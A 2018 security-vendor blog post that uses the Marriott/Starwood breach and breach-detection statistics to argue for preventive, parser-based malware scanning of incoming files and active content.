Boris Vaynberg

by Boris Vaynberg

VP and GM for Advanced Threat Detection

Posted Dec 26, 2018

Malware can stick around for years.

Right approach to awareness training.jpg

Wine, whiskey and cheese are all things we know and love but take notoriously long to achieve their optimal performance (read taste/cost). Malware on the other hand that is active for years inside your infrastructure is a completely different story. 

How many times will we have to read new headlines reporting that breaches have been in place and causing damage for years before being identified and remediated before we finally realize that the definition of futility is doing the same thing and expecting a different result?

Is there a time limit on how long you should wait before you are ready for a different cybersecurity strategy or are you waiting until your organization becomes the next headline?

Four Years In The Making

Rachel Kraus reported in her Mashable article titled “Marriott data breach affected 500 million customers over four years:”

“Marriott International, Inc. disclosed a data breach of its Starwood guest reservation database on Friday. It estimates that the hack has affected 500 million customers, and acknowledged that the compromise had gone undetected for four years; hackers have had access to components of the database since 2014, and Marriott only became aware of any security issue in September 2018.”

Unfortunately, Marriott is not alone. The 2018 Poneman report shows that “In this year’s study, the average cost of a data breach per compromised record was $148, and it took organizations 196 days, on average, to detect a breach.”

Knowing that even one day could completely devastate an organization, how can we tolerate a 196-day average? The time is now to evaluate a new set of cyber security principles.

Prevention Eliminates The Waiting Game

The best way to avoid the waiting game and perhaps be the next headline that embarrasses your company and impacts your shareholder value is to apply these three principle strategies:

  1. Prevent, don’t remediate: Strengthen your cyber defenses dramatically by preventing attacks before they enter and harm your organization, your customers and your brand. Remediation is costly, prevention is not.
  2. Detect the undetected: Identify any malicious or hidden code within incoming data files whether on your network or in a cloud. What you don’t know or cannot see can harm you.
  3. Avoid the firedrill: Proactively and radically improve the agility of your cyber security. Finally, you can detect and protect against unknown (”zero-day”) risks, so at last you can take the panic out of cyber security.

The primary key is to protect against malware in active content and file-less malware as well. Active content such as macros should be de-obfuscated no matter the level of nesting or encryption and evaluated to determine its true purpose. Malicious scripts, links and URLs that may be hidden, self-extracting or even on remote servers should be instantaneously analyzed and determined to be clean or not.

Your Solution Shouldn’t Break The Bank Either

Network-based software security solutions don’t require additional capital investment as do other solutions. They also usually do not need additional human capital to manage and constantly monitor, which drives up operational TCO. Evaluate parser-based solutions that are agnostic to client-side applications, OS’s and the environment in which they operate.

These solutions are not evadable and can handle extremely high volumes of content traffic directly through major ingress vectors such as email, and usually have simple yet extensible RESTful API integrations directly with proxies for web downloads, B2B connections and cloud file sharing applications for identical results to provide enterprises homogeneous and granular results down to the exploit and attack payload no matter how encrypted or obfuscated it may be.

Ultimately your costs will be reduced, and your CFO will be happier.

Want more great articles like this?Subscribe to our blog.

Get all the latest news, tips and articles delivered right to your inbox

Boris Vaynberg

by Boris Vaynberg

VP and GM for Advanced Threat Detection

Posted Dec 26, 2018

You may also like:

For Internal Email Threats, Consider Employee Behavior

Security without factoring in employee b…

Security without factoring in employee behavior is bad secur… Read More >

Sam Curry

by Sam Curry

Chief Security Officer, Cybereason

Posted Dec 03, 2018